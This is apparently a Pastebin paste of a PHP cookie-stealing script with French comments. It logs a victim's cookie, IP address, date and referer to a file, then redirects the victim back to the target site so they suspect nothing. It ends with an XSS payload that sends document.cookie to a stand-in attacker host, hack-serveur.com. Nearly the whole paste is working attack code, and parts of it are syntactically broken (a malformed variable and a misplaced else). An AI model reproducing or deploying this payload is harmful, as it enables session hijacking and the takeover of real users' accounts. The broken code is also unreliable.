Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /****** Exemple de fichier qui va récupéré les cookies et les transmettre via HTTP sous forme d'un fichier texte avec les informations nécéssaires ************
- ******* Il est clair sans exploiter une faille avant ou faire en sorte d'amener le client vers cette nouvelle connection n'aura aucune incidence majeure ******
- */
- $cookie = $_GET['c']; // on importe la variable GET et lui appose le nom ,c représente les données envoyées au script PHP dans une URL
- $ip = getenv ('REMOTE_ADDR'); // On récupére l'ip du client Tant qu'à faire
- $date=date('j F, Y, g:i a'); // La date du méfait lol
- $referer=getenv ('HTTP_REFERER'); //l'en tête de la connection client
- if(count($_$cookie) > 0) // Le $_COOKIE représente des données disponibles pour un script PHP via des cookies HTTP. on vérifie qu'ils sont activés.
- {
- $fp = fopen( 'cookies.txt' , 'a' ); // On ouvre cookies.txt en edition (il est créé si il n’existe pas)
- fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date et Heure: ' .$date. '< br > Header: '.$referer.'< br > < br > < br >'); // On écrit le contenu du cookie.txt
- fclose($fp); // On ferme le fichier cookies.txt
- header ('Location: http://www.cible.com'); // on ramène l'utilisateur sur le site cible pour qu'il ne se doute de rien
- else
- {
- $fp = fopen( 'cookies.txt' , 'a' );
- fwrite($fp,'Cookie #'.$cookie.'non trouver');
- fclose($fp);
- header ('Location: http://www.cible.com'); // on ramène l'utilisateur sur le site cible car on n'a pas eu de connection viable
- }
- }
- ?>
- // Pour ce qui est de l'injection elle sera du type :
- <SCRIPT>
- Document.write('<img src=\'http://hack-serveur.com/volcookies.php?cookie=c'+escape(document.cookie)+'\' height=1 width=1>');
- </SCRIPT>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement